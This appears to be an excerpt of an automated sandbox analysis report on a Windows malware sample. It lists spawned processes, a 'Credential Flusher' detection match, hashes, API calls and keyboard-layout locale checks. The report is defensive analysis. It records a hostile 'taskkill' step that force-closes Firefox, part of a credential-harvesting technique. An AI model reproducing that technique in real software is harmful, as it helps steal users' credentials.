Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3516 -parentBuildID 20230927232528 -prefsHandle 2672 -prefMapHandle 2612 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88ac05a8-4630-40f5-8a59-e55504046001} 3520 "\\.\pipe\gecko-crash-server-pipe.3520" 28c9d3bac10 rdd
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:46:50
Start date:	05/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe"
Imagebase:	0x6c0000
File size:	919'552 bytes
MD5 hash:	9BDCA68B008C8506E9070AA48676D172
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialFlusher, Description: Yara detected Credential Flusher, Source: 00000023.00000002.2968432437.0000000001588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	12:46:50
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0x400000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:46:50
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:46:57
Start date:	05/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0d287ea527.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	12:46:58
Start date:	05/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2228,i,13965840192898022017,8926137046565118761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.8%
Total number of Nodes:	762
Total number of Limit Nodes:	24

Executed Functions

Function 00F3652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00F3652A,?,?,?,?,?,00F37661), ref: 00F36566

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a5ff88e175683cc094a1357a6e34f910f76968b5f62b03ba32d8b8ea63e9edfe
Instruction ID: 6146ce59a29bb110a61f527abad8db2150de105280099e313fd7f0c135d650c4
Opcode Fuzzy Hash: a5ff88e175683cc094a1357a6e34f910f76968b5f62b03ba32d8b8ea63e9edfe
Instruction Fuzzy Hash: 0AE086701411087ACF357B18DC1DD8C3B69EB91770F044430FE059A125CB29DD82EA50

Function 05080C8E Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699539569.0000000005080000.00000040.00001000.00020000.00000000.sdmp, Offset: 05080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5080000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c841ad9e613e77e3b584bc26910aad54f3e9e576c88eb4f85faab176ed1c4feb
Instruction ID: bf74f0ce12e111190a84bb53ed1118855741d8d4aee1c050e77c37bf21e90391
Opcode Fuzzy Hash: c841ad9e613e77e3b584bc26910aad54f3e9e576c88eb4f85faab176ed1c4feb
Instruction Fuzzy Hash: D6E039EF25D120BC7041E6823B38EFF579EE0D67303318427F883C4A0292990E9D2132

Function 00F05C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 00F0612B
00000422, xrefs: 00F060C9
Keyboard Layout\Preload, xrefs: 00F06054
00000419, xrefs: 00F06098
00000423, xrefs: 00F060FA

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: d272f0f5ab713f2c83b2629bba4ab91d7a804805775d03b5af70cc474014e574
Instruction ID: 2a9f4314e4603de2602d05f8d0b869b43c5ff9d3dcecbbf42e8aa36ede28fc4c
Opcode Fuzzy Hash: d272f0f5ab713f2c83b2629bba4ab91d7a804805775d03b5af70cc474014e574
Instruction Fuzzy Hash: 91F1D370A0024CABEB24DF54CC84BDEBBB9EF45704F504199E918A72C1DBB49A84EF95

Function 00F09BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 62fea3afaa3b918f6d2e7cac544564615aaa0f140a92215314f7958647a66be2
Instruction ID: 70e6e2983a4c5639a08dd64b0e6396de421c7824dbbed58e9cab7908fd8a14fc
Opcode Fuzzy Hash: 62fea3afaa3b918f6d2e7cac544564615aaa0f140a92215314f7958647a66be2
Instruction Fuzzy Hash: 2B315971B04204CBEB18DB78DD89BADB772EBD6320F248218E454973D6D7B58AC0B752

Function 00F09F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6ef2f37b3d2276d5d24629d80f558ae9d38467e2a36bb059c7b1d683b359dde6
Instruction ID: 182f6e64a309aee3f06df7cd2b9fbc3afb8690e87c735474c55ec57fd220c9fc
